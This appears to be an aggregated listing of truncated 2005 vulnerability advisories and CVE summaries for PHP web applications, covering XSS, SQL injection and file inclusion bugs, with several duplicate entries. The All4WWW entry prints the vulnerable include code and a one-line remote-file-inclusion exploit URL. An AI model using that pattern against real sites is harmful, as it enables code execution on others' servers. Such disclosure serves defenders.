egroupware -- multiple cross-site scripting (XSS) and SQL injection vulnerabilities

Multiple cross-site scripting XSS vulnerabilities in eGroupware before 1.0.0.007 allow remote attackers to inject arbitrary web script or HTML via the 1 abid, 2 page, 3 type, or 4 lang parameter to index.php or 5 categoryid parameter. Multiple SQL injection vulnerabilities in index.php in...

AzDGDatingPlatinum.txt

ADZ Security Team =================== Info Program: AzDGDatingPlatinum Version: tested 1.1.0 Modules: view.php, members/index.php Bug type: SQL Injection, XSS Vendor site: http://www.azdg.com/ Vendor Informed: Yes =================== Bug Info SQL Injection: At module view.php I've found a logical...

CVE-2005-1143

EasyPHPCalendar vulnerability CVE-2005-1143: XSS in index.php via the yr parameter, affecting versions prior to 6.2.8. Remote code execution of arbitrary scripts/HTML possible as described. Remediation: upgrade to 6.2.8 or later. No exploitation details provided in the connected documents.

All4WWW-Homepagecreator Remote Command Execution

Script: All4WWW-Homepagecreator Version: v1.0a Vendor: http://www.All4WWW.com I. Bug Code On index.php ... if!$site $site="home"; include "$site.dat"; ... II. Exploit vuln-host/index.php?site=http://host/some-file PS.: The vendor wasn't inform. by DominusVis Infektion Group...

All4WWW-HomePageCreator 1.0 - 'index.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/13169/info All4WWW-Homepagecreator is affected by an arbitrary remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an 'include' function call. An attacker may...

CVE-2005-1074

CVE-2005-1074 : SQL injection in index.php for RadScripts RadBids Gold 2. An attacker can supply the mode parameter to remotely execute arbitrary SQL commands. Affected: RadScripts RadBids Gold 2; vulnerability arises in the index.php handling of mode. CVSSv2 base score 7.5 (HIGH) with network ac...

CVE-2005-1073

CVE-2005-1073 describes a directory-traversal vulnerability in RadScripts RadBids Gold 2, where an attacker can read arbitrary files via the read parameter in index.php. The NVD entry lists a 5.0/Medium CVSS v2 base score with network exposure and no authentication, indicating remote access is po...

CVE-2005-1079

The CVE-2005-1079 entry describes a SQL injection in zOOm Media Gallery 2.1.2 through the catid parameter in index.php, allowing remote attackers to execute arbitrary SQL commands. Affected software: zOOm Media Gallery 2.1.2 (index.php vulnerability in catid). Root cause: unsafely concatenated us...

CVE-2005-1083

CVE-2005-1083 concerns index.php in aeDating 3.2, where an attacker can remotely include arbitrary files via the skin parameter. This is a plain file inclusion vulnerability and results in arbitrary file inclusion. Context from multiple sources (NVD/Red Hat/CVE records) confirms the affected prod...

CVE-2005-1074

SQL injection vulnerability in index.php for RadScripts RadBids Gold 2 allows remote attackers to execute arbitrary SQL commands via the mode parameter...

CVE-2005-1083

index.php in aeDating 3.2 allows remote attackers to include arbitrary files via the skin parameter...

CVE-2005-1075

Multiple cross-site scripting XSS vulnerabilities in RadScripts RadBids Gold 2 allow remote attackers to inject arbitrary web script or HTML via 1 the farea parameter to faq.php or the 2 cat, 3 order, or 4 area parameters to index.php...

CVE-2005-1143

Cross-site scripting XSS vulnerability in index.php in EasyPHPCalendar before 6.2.8 allows remote attackers to inject arbitrary web script or HTML via the yr parameter...

CubeCart <= 2.0.6 Multiple SQL Injections

The installed version of CubeCart on the remote host suffers from multiple SQL injection vulnerabilities due to its failure to sanitize user input via the 'PHPSESSID' parameter of the 'index.php' script, the 'product' parameter of the 'tellafriend.php' script, the 'add' parameter of the...

CVE-2005-0992

Cross-site scripting XSS vulnerability in index.php in phpMyAdmin before 2.6.2-rc1 allows remote attackers to inject arbitrary web script or HTML via the convcharset parameter...

CubeCart 2.0.x - &#039;index.php&#039; Multiple Full Path Disclosures

source: https://www.securityfocus.com/bid/13050/info CubeCart is reported prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. These issues affect the 'index.php',...

phpMyAdmin index.php convcharset Parameter XSS

The installed version of phpMyAdmin suffers from a cross-site scripting vulnerability due to its failure to sanitize user input to the 'convcharset' parameter of the 'index.php' script. A remote attacker may use these vulnerabilities to cause arbitrary code to be executed in a user's browser to...

CVE-2005-0879

CVE-2005-0879 affects Vortex Portal Content Management System. It is a PHP remote file inclusion flaw in content.php and index.php that lets an attacker execute arbitrary PHP code by passing a URL in the act parameter. Documented impact per NVD: partial confidentiality, integrity, and availabilit...

CVE-2005-0870

Multiple cross-site scripting XSS vulnerabilities in phpSysInfo 2.3, when registerglobals is enabled, allow remote attackers to inject arbitrary web script or HTML via the 1 sensorprogram parameter to index.php, 2 textlanguage, 3 texttemplate, or 4 hidepicklist parameter to systemfooter.php...

CVE-2005-0889

CVE-2005-0889 describes a cross-site scripting (XSS) vulnerability in Dream4 Koobi CMS 4.2.3, specifically in index.php where the area parameter can be abused to inject arbitrary script/HTML. The vulnerability is documented with a CVSS v2 base score of 4.3 (Medium) and indicates that the attack v...